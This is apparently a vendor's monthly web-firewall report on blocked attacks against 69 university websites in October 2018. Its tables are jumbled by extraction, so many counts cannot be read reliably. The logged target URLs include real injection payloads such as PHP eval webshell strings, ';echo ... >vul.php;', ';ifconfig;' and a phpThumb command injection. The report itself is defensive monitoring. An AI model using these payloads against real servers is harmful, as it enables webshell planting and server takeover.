合同站点安全防护月报
(2018年10月01日~10月31日)
风暴中心
2018年11月01日
目录
1.
1.2.网站安全.......................................................................................................................5
2.高级攻击威胁详情分析
2.2.CC攻击详情...............................................................................................................12
2.3.扫描攻击详情.............................................................................................................12
3.安全风险详情分析
3.2.攻击源TOP10分析.................................................................................................100
3.3.攻击区域详情分析...................................................................................................105
4.
1.安全风险概况 【防护时段】:2018-10-01至2018-10-31;【防护范围】:党委宣传部()等共69个网站,其中69个已解析,0个未解析;【防护动态】:本月所有攻击均已被玄武盾拦截,网站共出现0起安全事件;【整体安全趋势】:本月网站群共计受到攻击138994次,较上月减少190293次,攻击趋势有所缓和; 在风暴中心提供的专业、稳定云防护服务下,网站所有攻击均被有效阻断,未造成攻击成功或篡改成功的安全事件,有效地保障网站安全、平稳地运行。
1.1.安全趋势 其中拦截到的攻击次数越多,表示网络环境遭受黑客攻击的次数越多,网络环境越不安全,黑客能成功入侵的可能性越大,使用玄武盾云防护系统能有效抵御黑客利用已存在漏洞发起的攻击。
每日攻击趋势图: 1200010000 8000600040002000
0 网站群受攻击趋势 根据风暴中心拦截攻击情况来看,该站群主要受到20时、21时、22时的攻击量最多。
攻击时间段趋势图: 各个时间段攻击量趋势图 1200010000 8000600040002000
0 1.2.网站安全 期间合同站点累计遭受138994次攻击,主要攻击目标为首页(,攻击量32883次,占比23.66%)、新闻网(,攻击量10384次,占比7.47%)、商学院(,攻击量5819次,占比4.19%)等站点,以上攻击被有效阻断,未造成攻击成功或篡改成功的安全事件。
业务系统遭受攻击分布 其他 序号12 站点 首页(www.xaufe.edu) 新闻网(news.xaufe.edu) 攻击类型TOP5 疑似跨站攻击(9822),命令注入攻击(6301),一句话webshell(5050),文件限制(3133),扫描工具(2337)疑似跨站攻击(4263),一句话webshell(3246),恶意user-agents(835),扫描工具(740),协议违规(699) 攻击次数3288310384 攻击占比23.66%7.47% 对比分析 较上月减少87156次,攻击占比下降12.79% 较上月减少8423次,攻击占比上升1.76% 风险等级高 高 协议违规(1138),疑 商学院 似跨站攻击(1091), 命令注入攻击(858),
3 (sxy.xaufe.edu.c一句话 5819 n) webshell(822),SQL 注入攻击(668) 一句话 本科招生信息webshell(2361),疑似 网 跨站攻击(1609),恶
4 (zhaosheng.xauf意user-agents(297),5462 ) 扫描工具(292),SQL 注入攻击(202) 疑似跨站攻击 体育部 (2101),命令注入攻 击(1367),一句话
5 (tiyubu.xaufe.ed
webshell(1105),SQL5344 ) 注入攻击(336),恶意 user-agents(142) 疑似跨站攻击 教务 (1301),一句话 webshell(1231),恶意
6 (jiaowu.xaufe.ed
user-agents(759),文4970 ) 件限制(636),协议违 规(316) 一句话 研究生部 webshell(1504),疑似 跨站攻击(1431),恶
7 (yanjiusheng.xau
意user-agents(728),4955 ) 协议违规(534),命令 注入攻击(316) 疑似跨站攻击 图书馆 (1737),一句话 webshell(1219),命令
8 (注入攻击(883),协议4776 ) 违规(379),跨站脚本 攻击(143) 命令注入攻击 校友总会 (1576),疑似跨站攻 击(1472),一句话
9 (xiaoyou.xaufe.e
webshell(814),协议4265 ) 违规(169),恶意 user-agents(93) 经济学院 疑似跨站攻击 10(jingji.xaufe.edu.(1367),一句话 4033 4.19%3.93%3.84%3.58%3.56%3.44%3.07%2.9% 较上月增加3064次,攻击高占比上升3.35% 较上月减少5412次,攻击高占比上升0.63% 较上月减少2498次,攻击高占比上升1.46% 较上月增加1255次,攻击中占比上升2.45% 较上月减少937次,攻击中占比上升1.77% 较上月减少5次,攻击占比中上升1.99% 较上月减少4484次,攻击中占比上升0.41% 较上月减中少6289 cn) webshell(1147),恶意 user-agents(588),协 议违规(347),SQL注 入攻击(259) 实验实训教学协议违规(930),疑似 管理中心 跨站攻击(884),命令 11 注入攻击(624),一句3972 (sxzx.xaufe.edu.c话webshell(473), n) SQL盲注攻击(288) 疑似跨站攻击 信息学院 (1128),一句话 webshell(727),SQL 12(xinxi.xaufe.edu.注入攻击(550),恶意3801 cn) user-agents(544),协 议违规(460) 疑似跨站攻击(969), 精品课程 命令注入攻击(948), 一句话 13(jpkc.xaufe.edu.webshell(885),协议3274 cn) 违规(209),恶意 user-agents(107) 一句话 团委 webshell(1426),疑似 跨站攻击(874),恶意 14(tuanwei.xaufe.euser-agents(282),协3187 ) 议违规(208),SQL注 入攻击(138) 一句话 继续教育学院webshell(1375),疑似 (培训中心)跨站攻击(1259),扫15(jxjy.xaufe.edu.c描工具(146),协议违3106 n) 规(132),恶意 user-agents(76) 中国(西安)丝协议违规(870),疑似 绸之路研究院跨站攻击(821),命令 16 注入攻击(641),一句2852 (sczl.xaufe.edu.c话webshell(367),漏 n) 洞防护(46) 疑似跨站攻击(770), 统计学院 一句话 webshell(679),命令 17(tongji.xaufe.edu注入攻击(524),协议2728 ) 违规(301),恶意 user-agents(190) 2.86%2.73%2.36%2.29%2.23%2.05%1.96% 次,攻击占比下降0.23% 较上月增加1885次,攻击中占比上升2.23% 较上月减少14336次,攻击中占比下降2.78% 较上月减少2681次,攻击中占比上升0.55% 较上月减少2023次,攻击中占比上升0.71% 较上月增加275次,攻击中占比上升1.37% 较上月增加48次,攻击中占比上升1.2% 较上月减少1363次,攻击中占比上升0.72% 命令注入攻击(706), 文学院 疑似跨站攻击(532), 一句话 18(wenxue.xaufe.ewebshell(316),文件2009 ) 限制(162),协议违规 (116) 疑似跨站攻击(671), 党委宣传部 一句话 webshell(611),协议 19(xuanchuan.xauf违规(130),恶意 1849 ) user-agents(124),漏 洞防护(102) 命令注入攻击(700), 基建处 疑似跨站攻击(398), SQL注入攻击(342), 20(jijian.xaufe.edu.一句话 1811 cn) webshell(271),恶意 user-agents(45) 疑似跨站攻击(655), 期刊管理中心一句话 webshell(457),协议 21(qikan.xaufe.edu违规(150),SQL注入1612 ) 攻击(106),恶意 user-agents(93) 疑似跨站攻击(443), 信息与教育技一句话 术中心 webshell(354),恶意 22(ietc.xaufe.edu.cuser-agents(273),文1455 n) 件限制(145),协议违 规(83) 疑似跨站攻击(354), 管理学院恶意 user-agents(334),
一 23(guanli.xaufe.ed句话webshell(223),1276 ) 协议违规(168),SQL 注入攻击(98) 协议违规(446),一句 科研处 话webshell(384),疑 24(keyan.xaufe.ed似跨站攻击(138),恶1275 ) 意user-agents(107), SQL注入攻击(81) 保卫处 疑似跨站攻击(490), 25(baowei.xaufe.e一句话 1268 ) webshell(354),命令 1.45%1.33%1.3%1.16%1.05%0.92%0.92%0.91% 较上月减少5511次,攻击中占比下降0.83% 较上月减少487次,攻击中占比上升0.62% 较上月减少1441次,攻击中占比上升0.31% 较上月减少1799次,攻击中占比上升0.12% 较上月减少2352次,攻击中占比下降0.11% 较上月减少607次,攻击中占比上升0.35% 较上月减少181次,攻击中占比上升0.48%较上月减少13526中次,攻击 注入攻击(254),扫描 工具(68),恶意 user-agents(29) 疑似跨站攻击(319), 人事处 扫描工具(223),一句 26(renshi.xaufe.ed话webshell(186),协1263 ) 议违规(161),恶意 user-agents(156) 命令注入攻击(537), 经济管理虚拟疑似跨站攻击(308), 仿真 一句话 27(xnfz.xaufe.edu.cwebshell(283),恶意1239 n) user-agents(33),协 议违规(29) 一句话 财务信息网 webshell(349),疑似 跨站攻击(289),协议 28(违规(153),恶意 1134 ) user-agents(147),扫 描工具(54) 一句话 学工部 webshell(672),疑似 跨站攻击(155),恶意 29
(xuegong.xaufe.user-agents(124),1113 ) SQL注入攻击(93), 漏洞防护(23) 疑似跨站攻击(351), 公共管理学院一句话 webshell(297),恶意 30(gongguan.xaufeuser-agents(249),协1107 ) 议违规(92),SQL注 入攻击(37) SQL注入攻击(345), 外国语学院首一句话 页 webshell(276),疑似 31(wgyxy.xaufe.ed跨站攻击(174),协议1044 ) 违规(108),SQL盲注 攻击(51) 扫描工具(233),一句 交流与合作 话webshell(227), 32(guojiao.xaufe.eSQL注入攻击(142),984 ) 协议违规(121),恶意 user-agents(106) 33审计处 协议违规(270),文件866 0.91%0.89%0.82%0.8%0.8%0.75%0.71%0.62% 占比下降3.58% 较上月减少1577次,攻击中占比上升0.05% 较上月增加529次,攻击中占比上升0.67% 较上月减少1308次,攻击中占比上升0.08% 较上月增加193次,攻击中占比上升0.52% 较上月减少190次,攻击中占比上升0.41% 较上月减少263次,攻击中占比上升0.35% 较上月减少2372次,攻击低占比下降0.31%较上月增低 (shenji.xaufe.ed限制(97),一句话 ) webshell(81),SQL盲 注攻击(75),恶意 user-agents(65) 一句话 纪委 webshell(415),疑似 跨站攻击(205),恶意 34(jiwei.xaufe.edu.user-agents(42),漏764 cn) 洞防护(38),SQL注 入攻击(21) 一句话 离退休人员管webshell(324),SQL 理处 注入攻击(172),疑似 35(litui.xaufe.edu.c跨站攻击(111),恶意749 n) user-agents(44),协 议违规(33) 一句话 法学院 webshell(201),恶意 user-agents(136),协 36(faxue.xaufe.edu议违规(100),疑似跨739 ) 站攻击(96),文件注 入攻击(72) 协议违规(412),恶意 教务管理 user-agents(86),漏 37(jwgl.xaufe.edu.洞防护(84),疑似跨723 cn) 站攻击(53),命令注 入攻击(28) 一句话 党政办公室 webshell(308),疑似 跨站攻击(296),协议 38(dangzheng.xauf违规(33),恶意 706 ) user-agents(26),漏 洞防护(14) 疑似跨站攻击(311), 教学评估中心一句话 webshell(255),协议 39(pjb.xaufe.edu.c违规(63),恶意 706 n) user-agents(33),文 件限制(11) 命令注入攻击(230), 后勤服务集团疑似跨站攻击(197), 40(houqin.xaufe.eSQL注入攻击(130),694 ) 恶意 user-agents(35),协 0.55%0.54%0.53%0.52%0.51%0.51%0.5% 加121次,攻击占比上升0.39% 较上月减少505次,攻击低占比上升0.16% 较上月减少928次,攻击低占比上升0.03% 较上月减少1889次,攻击低占比下降0.27% 较上月减少1172次,攻击低占比下降0.06% 较上月减少2646次,攻击低占比下降0.51% 较上月减少3039次,攻击低占比下降0.63% 较上月减少323次,攻击低占比上升0.19% 议违规(33) 一句话 党委组织部 webshell(326),疑似 跨站攻击(126),协议 41(zuzhibu.xaufe.e违规(100),恶意 665 ) user-agents(49),SQL 注入攻击(22) 一句话 高等教育研究webshell(289),疑似 所网站 跨站攻击(152),扫描 42(工具(78),恶意 625 ) user-agents(27),漏 洞防护(26) 疑似跨站攻击(317), 档案馆 一句话 webshell(147),协议 43
(dag.xaufe.edu.c违规(74),恶意 581 n) user-agents(31),SQL 注入攻击
(6) 疑似跨站攻击(156), 工会一句话 webshell(133),命令 44(gonghui.xaufe.e注入攻击(58),漏洞525 ) 防护(57),恶意 user-agents(45) 一句话 院报-在线阅读webshell(233),疑似 跨站攻击(65),SQL 45(xacyb.xaufe.edu注入攻击(56),文件520 ) 限制(53),恶意 user-agents(48) 校情民意管理疑似跨站攻击(180), 平台 一句话webshell(72), 46 漏洞防护(38),恶意425 (user-agents(31),协 ) 议违规(27) 一句话 合作发展处 webshell(213),疑似 跨站攻击(103),恶意 47(hzfz.xaufe.edu.cuser-agents(38),协424 n) 议违规(33),文件限 制(17) 两学一做学习疑似跨站攻击(138), 48教育专题网 恶意 339 0.48%0.45%0.42%0.38%0.37%0.31%0.31%0.24% 较上月减少372次,攻击低占比上升0.17% 较上月减少404次,攻击低占比上升0.14% 较上月增加45次,攻击低占比上升0.26% 较上月减少789次,攻击低占比下降0.02% 较上月增加61次,攻击低占比上升0.23% 较上月减少1088次,攻击低占比下降0.15% 较上月减少666次,攻击低占比下降0.02% 较上月减低少1852 (lxyz.xaufe.edu.cuser-agents(39),
一 n) 句话webshell(30), 文件限制(30),协议 违规(26) 一站式服务平协议违规(79),疑似 台 跨站攻击(73),命令 49 注入攻击(28),HTTP335 (my.xaufe.edu.c方法限制(27),跨站 n) 脚本攻击(24) 恶意 user-agents(136),协 wsbgt.xaufe.edu议违规(61),疑似跨 50(wsbgt.xaufe.站攻击(49),文件限301 ) 制(16),SQL注入攻 击(15) 0.24%0.22% 次,攻击占比下降0.43% 较上月减少1494次,攻击低占比下降0.32% 较上月减少1304次,攻击低占比下降0.27%
2.高级攻击威胁详情分析 2.1.DDOS攻击详情 未开通该服务,此项无数据。
2.2.CC攻击详情 优化中,后续会上线。
2.3.扫描攻击详情 本月未受到扫描攻击
3.安全风险详情分析 3.1.攻击类型详情分析 3.1.1命令注入攻击 【描述】仅仅需要输入数据的场合,却伴随着数据同时输入了恶意代码,而装载 数据的系统对此并未设计良好的过滤过程,导致恶意代码也一并执行,最终导致 信息泄露或者正常数据的破坏。
攻击风险等级:高。
【攻击详情】 序号
站点 首页1() 校友总会
2 (xiaoyou.xaufe.edu.c n) 体育部
3 ( ) 精品课程4()
5 图书馆 目的地址TOP5/utility/convert/data/config.inc.php、/plus/90sec.php、/plus/mytag_js.php?
aid=511348、/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php、/1.php/1.php、/index.php?
m=formguide&c=index&a=show&formid=1&siteid=1、/utility/convert/data/config.inc.php、/bbs/utility/convert/data/config.inc.php、/test.php/utility/convert/data/config.inc.php、/plus/mytag_js.php?
aid=511348、/plus/90sec.php、/1.php、/bbs/utility/convert/data/config.inc.php/utility/convert/data/config.inc.php、/1.php、/bbs/utility/convert/data/config.inc.php、/index.php?
m=formguide&c=index&a=show&formid=1&siteid=1、/fuck.php/info/80793.jspx、 攻击次数63011576 1367 948883 对比分析较上月减少70211次,攻击占比下降18.71% 较上月减少2009次,攻击占比上升0.04% 较上月减少1017次,攻击占比上升0.26% 较上月减少511次,攻击占比上升0.24% 较上月增 ()/utility/convert/data/config.inc.ph p、/1.php、 /bbs/utility/convert/data/config.i nc.php、/include/code/mp.php /upload.asp、/1.php、 商学院 /bbs/utility/convert/data/config.i 6
()nc.php、858 /utility/convert/data/config.inc.ph p、/plus/bakup.php /utility/convert/data/config.inc.ph 文学院 p、/1.php、
7 (wenxue.xaufe.edu.c
/bbs/utility/convert/data/config.i706 n) nc.php、/plus/bakup.php、 /11m.php /utility/convert/data/config.inc.ph p、/1.php、 基建处 /index.php?
m=formguide&c=inde
8 ()
x&a=show&formid=1&siteid=1、700 /bbs/utility/convert/data/config.i nc.php、/11m.php /1.php、 /utility/convert/data/config.inc.ph 中国(西安)丝绸
p、
9 之路研究院 /bbs/utility/convert/data/config.i641 ()nc.php、 /login_wall.php?
login=cmd、 /11m.php 实验实训教学管理/info/279.jspx、 10中心 /utility/convert/data/config.inc.ph624 ()p、/1.php、/plus/bakup.php、 /11m.php /utility/convert/data/config.inc.ph11经济管理虚拟仿真p、/1.php、537 ()/bbs/utility/convert/data/config.inc.php、/11m.php、/2016/gou.php /info/3531.jspx、/1.php、 统计学院 /bbs/utility/convert/data/config.i 12
()nc.php、524 /utility/convert/data/config.inc.ph p、/plus/bakup.php 研究生部 /User/ShowUser.asp?
xk=1201&a 13
(yanjiusheng.xaufe.emp;ID=421、 316 加626次,攻击占比上升0.56%较上月增加287次,攻击占比上升0.45%较上月减少460次,攻击占比上升0.16% 较上月减少661次,攻击占比上升0.09% 较上月增加235次,攻击占比上升0.34% 较上月减少68次,攻击占比上升0.24%较上月增加526次,攻击占比上升0.39%较上月减少288次,攻击占比上升0.13%较上月增加208 ) /User/ShowUser.asp?
xk=0202&a mp;ID=633、 /User/ShowUser.asp?
xk=1202&a mp;ID=258、 /User/ShowUser.asp?
xk=0202&a mp;ID=409、 /User/ShowUser.asp?
xk=0202&a mp;ID=249 /1.php、 保卫处 /bbs/utility/convert/data/config.i 14
(baowei.xaufe.edu.cnc.php、254 /index.php?
m=formguide&c=inde n) x&a=show&formid=1&siteid=
1、 /plus/bakup.php、/11m.php /1.php、 /bbs/utility/convert/data/config.i 后勤服务集团 nc.php、 /index.php?
m=formguide&c=inde 15
(houqin.xaufe.edu.cx&a=show&formid=1&siteid=1、230 n) /plus/bakup.php、 /utility/convert/data/config.inc.ph p 人事处 /index.php?
m=formguide&c=inde x&a=show&formid=1&siteid=
1、 16
(/11m.php、/2016/gou.php、 133 ) /5t/css/mp.php、/5t/data/mp.php /1.php、 /utility/convert/data/config.inc.ph 学科办 p、 17
(xuekeban.xaufe.edu/admin.php/module/action/para92 m1/$%7B@eval($_POST%5Bc%5D ) )%7D、/admin_login.php、 /bbs/utility/convert/data/config.i nc.php /vendor/phpunit/phpunit/src/Util 本科招生信息网
/PHP/eval-stdin.php、 /yp/product.php?
pagesize=${${@ 18(zhaosheng.xaufe.edeval%28$_POST[-62]%29}}、 90 ) /admin_login.php、/conn.php、 /css/ing/admin_login.php 工会 /utility/convert/data/config.inc.ph 19
(gonghui.xaufe.edu.p、/plus/mytag_js.php、 58 cn) //vendor/phpunit/phpunit/src/Uti 次,攻击占比上升0.2% 较上月增加7次,攻击占比上升0.1% 较上月增加220次,攻击占比上升0.17% 较上月减少136次,攻击占比上升0.02% 较上月减少1193次,攻击占比下降0.32% 较上月减少12次,攻击占比上升0.03%较上月增加44次,攻击占比 l/PHP/eval-stdin.php、 /admin/snhxc/date.php、 /admin/snhxg/date.php /fetionlist.php、 /get_online_user.php?
k=e08c63f3 教务 3cbc7ba433d27ef77399d784&acti 20
(jiaowu.xaufe.edu.con=show4&uname=;echo%20%2752 n) vulnable%27>vul.php;、 /qqlist.php、/radtest.php、 /sinawblist.php /vendor/phpunit/phpunit/src/Util 经济学院 /PHP/eval-stdin.php、 21
()/login.action、52 //vendor/phpunit/phpunit/src/Uti l/PHP/eval-stdin.php /?
param=cmd.exe、 /admin/scripts/tinymce/jscripts/ti ny_mce/plugins/ibrowser/scripts/ phpThumb/phpThumb.php?
src=./ index.php&fltr[]=blur|5;echo+082 119f75623eb7abd7bf357698ff66c >cache/ix;、 /cms/plugins/content/jthumbs/in cludes/phpThumb.php?
src=./inde 审计处 x.php&fltr[]=blur|5;echo+082119f 75623eb7abd7bf357698ff66c>cac 22
(he/ix;、 32 )mon/scripts/phpThumb/php Thumb.php?
src=./index.php&fltr[] =blur|5;echo+082119f75623eb7a bd7bf357698ff66c>cache/i x;、 _hotornot2/ph pthumb/phpThumb.php?
src=./ind ex.php&fltr[]=blur|5;echo+08211 9f75623eb7abd7bf357698ff66c>c ache/ix; /xxjsjy.aspx?
zgh=2002010283&xm 教务管理 =陈淑芳&gnmkdm=N122309、 23
()/xscjcx.aspx?
xh=1602310320&xm28 =%D5%D4%CF%B2%D1%C7&gnm kdm=N121605 24一站式服务平台/cjtyrz/reg.action、/reg.action28() 上升0.04% 较上月增加35次,攻击占比上升0.03%较上月减少38次,攻击占比上升0.01% 较上月增加22次,攻击占比上升0.02% 较上月增加20次,攻击占比上升0.02%较上月增加10次, /radtest.php、 党委宣传部 //vendor/phpunit/phpunit/src/Uti l/PHP/eval-stdin.php、 25(xuanchuan.xaufe.e/fetionlist.php、/qqlist.php、 24 ) /ount/ountlist.php?
type=lis t&ount=;ifconfig; /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、/x.php、 团委 //vendor/phpunit/phpunit/src/Uti 26
(tuanwei.xaufe.edu.l/PHP/eval-stdin.php、 21 cn) /login.action、 /wp-content/themes/twentyeleve n/cons.php //vendor/phpunit/phpunit/src/Uti 新闻网
27 l/PHP/eval-stdin.php、19 ()/vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php、/login.action /vendor/phpunit/phpunit/src/Util
28期刊管理中心/PHP/eval-stdin.php、/、12 ()//vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 信息与教育技术中 29心 /vendor/phpunit/phpunit/src/Util11 ()/PHP/eval-stdin.php /zftal-mobile/webservice/oa/Emai30(jlInformationXMLService、
9 )/zftal-mobile/webservice/newmobile/MobileLoginXMLService/vendor/phpunit/phpunit/src/Util 校情民意管理平台/PHP/eval-stdin.php、31()/login.action、8 //vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 管理学院 //vendor/phpunit/phpunit/src/Uti 32(l/PHP/eval-stdin.php、
7 )/guanlixueyuan/admin_edit.asp?
i d=&pid=154&ppid=23&pageno= 攻击占比上升0.01% 较上月减少23次,攻击占比上升0.01% 较上月减少14次,攻击占比上升0.01% 较上月减少126次,攻击占比下降0.03%较上月减少5次,攻击占比下降0%较上月减少865次,攻击占比下降0.26%较上月减少9次,攻击占比下降0% 较上月减少10次,攻击占比下降0% 较上月减少6次,攻击占比上升0.01% 院报-在线阅读 /vendor/phpunit/phpunit/src/Util 33()/PHP/eval-stdin.php、/cpanel
5 两学一做学习教育 34专题网 /vendor/phpunit/phpunit/src/Util4 ()/PHP/eval-stdin.php 财务信息网35() /login.action、/vendor/phpunit/phpunit/src/Util3/PHP/eval-stdin.php 公共管理学院 36(gongguan.xaufe.ed//vendor/phpunit/phpunit/src/Uti3 ) l/PHP/eval-stdin.php //vendor/phpunit/phpunit/src/Uti37信息学院l/PHP/eval-stdin.php、
3 ()/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 党政办公室 //vendor/phpunit/phpunit/src/Uti 38(dangzheng.xaufe.edl/PHP/eval-stdin.php、
2 ) /vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php 一卡通39 /vendor/phpunit/phpunit/src/Util2 ()/PHP/eval-stdin.php 交流与合作40(guojiao.xaufe.edu.c/vendor/phpunit/phpunit/src/Util2 n)/PHP/eval-stdin.php 继续教育学院(培//vendor/phpunit/phpunit/src/Uti 41训中心) l/PHP/eval-stdin.php、
2 ()/vendor/phpunit/phpunit/src/Util /PHP/eval-stdin.php 马克思主义学院/upload/201810/11/2018101108542(marxism.xaufe.edu.3033580.docx、2 cn)/upload/201810/11/201810110855083142.docx 较上月减少0次,攻击占比下降0%较上月减少13次,攻击占比下降0.01%较上月减少22次,攻击占比下降0.01%较上月减少8次,攻击占比下降0%较上月减少20次,攻击占比下降0.01%较上月减少10次,攻击占比下降0%较上月减少16次,攻击占比下降0.01%较上月减少12次,攻击占比下降0%较上月减少9次,攻击占比下降0% 较上月--,攻击占比-- 43OA办公平台//data/data/index.php2() 法学院44 /eWebeditor/UploadFile/20181011 ()5121718913.doc 国有资产管理处45 /website/new_show.aspx?
amp%31 ()Bid=3861&wt=
1 纪委46 //vendor/phpunit/phpunit/src/Uti1 ()l/PHP/eval-stdin.php 科研处47 //vendor/phpunit/phpunit/src/Uti1 ()l/PHP/eval-stdin.php 48(ne./vendor/phpunit/phpunit/src/Util1 ) /PHP/eval-stdin.php 49(/vendor/phpunit/phpunit/src/Util1)/PHP/eval-stdin.php 较上月减少16次,攻击占比下降 0.01%较上月减少8次,攻击占比下降0%较上月减少7次,攻击占比下降0%较上月减少10次,攻击占比下降0%较上月减少12次,攻击占比下降0%较上月减少12次,攻击占比下降0%较上月减少5次,攻击占比下降0% 3.1.2一句话webshell 【描述】Web系统中,远程攻击者会通过某种手段在页面中植入一句话木马, 之后通过菜刀等工具连接,进而控制服务器。
攻击风险等级:高。
【攻击详情】 序号站点首页 1() 目的地址TOP5//config/AspCms_Config.asp、//inc/config.asp、/plus/mytag_js.php?
aid=9090、 攻击次数5050 对比分析较上月减少2296次,攻击占 //css.asp、//admin/index.asp //config/AspCms_Config.asp、 新闻网 //inc/config.asp、//css.asp、
2 ()
/config/AspCms_Config.asp、 3246 /plus/mytag_js.php?
aid=9090 本科招生信息网//config/AspCms_Config.asp、
3 (zhaosheng.xaufe.ed/index.php、/config.php、 2361 ) /xiaoy.php、//inc/config.asp 研究生部 //config/AspCms_Config.asp、
4 (yanjiusheng.xaufe.e
//inc/config.asp、/config.php、
//inc/config.asp、
6 训中心) /plus/mytag_js.php?
aid=9090、1375 ()/config.php、 /plus/mytag_js.php?
aid=511348 教务 //config/AspCms_Config.asp、
7 (jiaowu.xaufe.edu.c
//inc/config.asp、/index.php、1231 n) //css.asp、//data/data.asp //config/AspCms_Config.asp、 图书馆 /config/AspCms_Config.asp、
8 ()
//inc/config.asp、/config.php、1219 /plus/mytag_js.php?
aid=511348 //config/AspCms_Config.asp、 经济学院 //inc/config.asp、
9 //admin/index.asp、 1147 ()
/plus/mytag_js.php?
aid=9527、 /config/AspCms_Config.asp 体育部 //config/AspCms_Config.asp、 10
(//inc/config.asp、//css.asp、 1105 比上升1.4%较上月减少1423次,攻击占比上升0.92%较上月减少315次,攻击占比上升0.89%较上月增加236次,攻击占比上升0.69%较上月减少432次,攻击占比上升0.47%较上月增加306次,攻击占比上升0.67%较上月增加411次,攻击占比上升0.64%较上月减少170次,攻击占比上升0.46%较上月减少1496次,攻击占比上升0.03%较上月增加297 ) /config/AspCms_Config.asp、 //data/data.asp //config/AspCms_Config.asp、 精品课程 //inc/config.asp、//css.asp、 11
()//admin/index.asp、 885 //data/data.asp 商学院 //config/AspCms_Config.asp、 12 //inc/config.asp、/config.php、
822 ()/web.php、/xiaoy.php 校友总会 //config/AspCms_Config.asp、 /plus/mytag_js.php?
aid=9090、13(xiaoyou.xaufe.edu.c/index.php、//inc/config.asp、814 n)/plus/mytag_js.php?
aid=9191 //config/AspCms_Config.asp、 信息学院 //inc/config.asp、 14()//admin/index.asp、//css.asp、727 /config/AspCms_Config.asp //config/AspCms_Config.asp、 统计学院 //inc/config.asp、 15()//admin/index.asp、//css.asp、679 /config.php 学工部 /index.php、/config.php、 /xiaoy.php、 16(xuegong.xaufe.edu./plus/ad_js.php?
aid=8888、 672 cn)/plus/mytag_js.php?
aid=9090 党委宣传部 //config/AspCms_Config.asp、 //inc/config.asp、//css.asp、 17
(xuanchuan.xaufe.e//admin/index.asp、 611 ) //data/data.asp 实验实训教学管理//config/AspCms_Config.asp、 18中心 //inc/config.asp、 473 //plus/mytag_js.php?
aid=9090、 ()/config/AspCms_Config.asp、/.php 19期刊管理中心 //config/AspCms_Config.asp、457 次,攻击占比上升0.54%较上月减少48次,攻击占比上升0.36%较上月增加440次,攻击占比上升0.47%较上月减少129次,攻击占比上升0.3%较上月减少3711次,攻击占比下降0.83%较上月减少236次,攻击占比上升0.21%较上月增加234次,攻击占比上升0.35%较上月减少269次,攻击占比上升0.17%较上月增加117次,攻击占比上升0.23%较上月减 () //inc/config.asp、//admin/index.asp、/plus/mytag_js.php?
aid=511348、/plus/mytag_js.php?
aid=9090 纪委 //config/AspCms_Config.asp、 20 //inc/config.asp、/config.php、
415 ()/index.php、/.php 科研处 /config.php、 21 //config/AspCms_Config.asp、384 ()/xiaoy.php、/index.php、/web.php 中国(西安)丝绸//config/AspCms_Config.asp、 22之路研究院 //inc/config.asp、//css.asp、367 ()//admin/index.asp、 //data/data.asp 保卫处 //config/AspCms_Config.asp、 //inc/config.asp、23(baowei.xaufe.edu.c//admin/index.asp、//css.asp、354 n)//data/data.asp //config/AspCms_Config.asp、 信息与教育技术中//inc/config.asp、 24心 /config/AspCms_Config.asp、 354 ()/config.php、 /plus/mytag_js.php?
aid=9090 财务信息网25() //config/AspCms_Config.asp、//inc/config.asp、/plus/mytag_js.php?
aid=9090、349//admin/index.asp、//css.asp 党委组织部 //config/AspCms_Config.asp、 26(zuzhibu.xaufe.edu.c//inc/config.asp、/config.php、326 n) /index.php、//admin/index.asp 离退休人员管理处//config/AspCms_Config.asp、 27 /config.php、/xiaoy.php、 324 ()/index.php、/web.php 少263次,攻击占比上升0.11%较上月增加124次,攻击占比上升0.21%较上月减少38次,攻击占比上升0.15%较上月减少205次,攻击占比上升0.09%较上月减少3703次,攻击占比下降0.98% 较上月减少471次,攻击占比下降0% 较上月减少302次,攻击占比上升0.05%较上月增加26次,攻击占比上升0.14%较上月减少60次,攻击占比上升0.11% 文学院 //config/AspCms_Config.asp、 28(wenxue.xaufe.edu.c//inc/config.asp、/config.php、316 n) /index.php、//css.asp 党政办公室 //config/AspCms_Config.asp、 //inc/config.asp、//css.asp、 29
(dangzheng.xaufe.ed/inc/config.asp、 308 ) //admin/index.asp 公共管理学院 //config/AspCms_Config.asp、 //inc/config.asp、
30(gongguan.xaufe.ed//admin/index.asp、//css.asp、297 ) //data/data.asp 高等教育研究所网//config/AspCms_Config.asp、31站()//inc/config.asp、/config.php、289 //admin/index.asp、/index.php /config.php、/index.php、经济管理虚拟仿真/xiaoy.php、32()/plus/mytag_js.php?
aid=8080、283 /.php 外国语学院首页//config/AspCms_Config.asp、 33(//inc/config.asp、/config.php、276 ) /index.php、//css.asp 基建处 //config/AspCms_Config.asp、 34 /config.php、/index.php、 271 ()
//inc/config.asp、/config.inc.php //config/AspCms_Config.asp、 教学评估中心 //inc/config.asp、 35 //plus/mytag_js.php?
aid=9527、
255 ()//plus/mytag_js.php?
aid=9090、 /config/AspCms_Config.asp 院报-在线阅读 //config/AspCms_Config.asp、 36 //inc/config.asp、/config.php、
233 ()/index.php、//css.asp 较上月增加89次,攻击占比上升0.16%较上月减少545次,攻击占比下降0.04%较上月增加60次,攻击占比上升0.14%较上月增加35次,攻击占比上升0.13%较上月减少84次,攻击占比上升0.09%较上月增加54次,攻击占比上升0.13%较上月减少112次,攻击占比上升0.07%较上月增加25次,攻击占比上升0.11%较上月增加188次,攻击占比上升 交流与合作 //config/AspCms_Config.asp、 /config.php、/index.php、37(guojiao.xaufe.edu.c/plus/mytag_js.php?
aid=511348、227 n)//inc/config.asp 管理学院 //config/AspCms_Config.asp、 //inc/config.asp、 38(//plus/mytag_js.php?
aid=9527、223 ) //css.asp、//data/data.asp 合作发展处 //config/AspCms_Config.asp、 39 /index.php、/config.php、 213 ()
//css.asp、//data/data.asp //config/AspCms_Config.asp、 法学院 //inc/config.asp、//css.asp、 40
()//data/data.asp、 201 //admin/index.asp 人事处 //config/AspCms_Config.asp、 //inc/config.asp、/、
41(//plus/mytag_js.php?
aid=9090、186 )//images/css/Thumb.asp //config/AspCms_Config.asp、 档案馆 /config/AspCms_Config.asp、/、 42()//admin/index.asp、 147 //data/data.asp 党委组织部党校/config.php、/index.php、43()/xiaoy.php、/.php、140 //config/AspCms_Config.asp 工会 //config/AspCms_Config.asp、 //inc/config.asp、//css.asp、 44
